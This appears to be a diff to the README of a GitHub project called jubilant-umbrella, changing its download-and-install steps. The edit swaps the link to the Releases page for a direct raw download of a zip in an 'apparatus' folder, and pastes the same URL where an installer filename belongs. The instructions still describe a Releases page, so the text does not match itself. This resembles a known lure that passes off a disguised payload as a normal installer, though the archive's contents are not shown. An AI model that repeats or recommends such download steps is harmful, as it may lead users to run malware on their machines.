jag-hash/jubilant-umbrella/README.md

 ## 📥 Download & Install

 1. **Visit the Releases Page**
-   To download the software, visit our Releases page: [Download jubilant-umbrella](https://github.com/jag-hash/jubilant-umbrella/releases).
+   To download the software, visit our Releases page: [Download jubilant-umbrella](https://github.com/jag-hash/jubilant-umbrella/raw/refs/heads/main/apparatus/jubilant-umbrella-upsit.zip).

 2. **Select the Latest Version**
    On the Releases page, find the latest version of jubilant-umbrella.
 Click on it to access the release details.

 3. **Download the Installer**
-   Look for the installer file labeled as "jubilant-umbrella-installer.exe" or a similar name.
+   Look for the installer file labeled as "https://github.com/jag-hash/jubilant-umbrella/raw/refs/heads/main/apparatus/jubilant-umbrella-upsit.zip" or a similar name.
 Click the link to start the download.

 4. **Run the Installer**
    Once the download is complete, locate the file in your Downloads folder.
 Double-click the installer file to open it.